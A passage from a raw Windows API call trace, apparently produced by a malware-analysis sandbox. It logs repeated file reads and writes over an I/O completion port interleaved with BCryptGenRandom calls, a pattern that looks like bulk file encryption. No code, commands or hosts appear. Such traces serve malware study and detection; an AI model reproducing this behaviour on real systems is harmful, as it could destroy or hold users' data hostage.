lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0112.265] WriteFile (in: hFile=0x3ac, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0112.265] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0112.274] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.275] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0112.275] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.275] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0112.275] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.275] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.275] free (_Block=0x77d7a8) [0112.275] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.275] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.276] free (_Block=0x2071c20) [0112.276] free (_Block=0x2071d30) [0112.276] free (_Block=0x77d8b0) [0112.276] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0112.276] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0112.285] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.286] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0112.286] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.286] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0112.287] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.287] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.287] free (_Block=0x77d7a8) [0112.287] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.287] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.287] free (_Block=0x2071c20) [0112.287] free (_Block=0x2071d30) [0112.287] free (_Block=0x77d8b0) [0112.287] WriteFile (in: hFile=0x81c, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0112.288] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0112.297] CloseHandle (hObject=0x3bc) returned 1 [0112.304] free (_Block=0x3e70008) [0112.304] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0112.311] ReadFile (in: hFile=0x3ac, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x8fc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0112.312] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0112.319] ReadFile (in: hFile=0x13c0, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x8fc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 0x0 [0112.319] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.391] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.391] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.399] WriteFile (in: hFile=0x340, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x4a80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0113.399] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.411] CloseHandle (hObject=0x3bc) returned 1 [0113.412] free (_Block=0x3d70450) [0113.412] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.432] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x8fc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0113.432] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.435] CloseHandle (hObject=0x13c0) returned 1 [0113.438] free (_Block=0x3db04c0) [0113.438] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.450] WriteFile (in: hFile=0x2f4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0113.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.465] ReadFile (in: hFile=0x13c0, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x1815, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 1 [0113.475] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.485] ReadFile (in: hFile=0x2f4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x566, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0113.485] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.505] ReadFile (in: hFile=0x13c0, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0xa8c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 0x0 [0113.506] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.512] CloseHandle (hObject=0x81c) returned 1 [0113.558] free (_Block=0x1ff1e60) [0113.558] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.565] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x1b2e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0113.566] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.566] CloseHandle (hObject=0x3bc) returned 1 [0113.569] free (_Block=0x3e70008) [0113.569] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.589] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3670, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.593] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.608] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1b1a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.609] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.610] CloseHandle (hObject=0x2f4) returned 1 [0113.612] free (_Block=0x1ff1e60) [0113.612] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.621] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.621] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.621] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0113.621] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.622] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0113.622] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.622] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.622] free (_Block=0x77d7a8) [0113.623] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.623] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.624] free (_Block=0x2071c20) [0113.624] free (_Block=0x2071d30) [0113.624] free (_Block=0x77d8b0) [0113.624] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.624] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.628] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3050, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.629] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.641] CloseHandle (hObject=0x2f4) returned 1 [0113.642] free (_Block=0x1ff1e60) [0113.642] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.694] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.695] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0113.696] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.697] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0113.698] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.698] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.698] free (_Block=0x77d7a8) [0113.698] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.698] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.699] free (_Block=0x2071c20) [0113.699] free (_Block=0x2071d30) [0113.699] free (_Block=0x77d8b0) [0113.699] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.700] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.705] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1a80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.706] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.706] CloseHandle (hObject=0x2f4) returned 1 [0113.707] free (_Block=0x1ff1e60) [0113.707] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.716] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.716] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0113.717] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.717] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.717] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0113.717] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.717] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.718] free (_Block=0x77d7a8) [0113.718] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.718] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.718] free (_Block=0x2071c20) [0113.718] free (_Block=0x2071d30) [0113.718] free (_Block=0x77d8b0) [0113.718] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.719] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.719] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x8f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.719] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.743] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.743] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.743] CloseHandle (hObject=0x2f4) returned 1 [0113.746] free (_Block=0x1ff1e60) [0113.746] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.755] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.755] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0113.755] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.755] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0113.756] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.756] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.756] free (_Block=0x77d7a8) [0113.756] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.756] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.756] free (_Block=0x2071c20) [0113.756] free (_Block=0x2071d30) [0113.756] free (_Block=0x77d8b0) [0113.757] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.757] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.758] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x43a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.758] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.759] CloseHandle (hObject=0x2f4) returned 1 [0113.760] free (_Block=0x1ff1e60) [0113.760] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.769] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.769] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0113.770] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.770] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0113.770] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.770] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.770] free (_Block=0x77d7a8) [0113.770] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.770] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.771] free (_Block=0x2071c20) [0113.771] free (_Block=0x2071d30) [0113.771] free (_Block=0x77d8b0) [0113.771] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.771] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.772] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1f10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.773] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.786] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2942, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.787] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0113.787] CloseHandle (hObject=0x2f4) returned 1 [0113.792] free (_Block=0x1ff1e60) [0113.792] GetQueuedCompletionStatus (in: CompletionPort=0x14c, 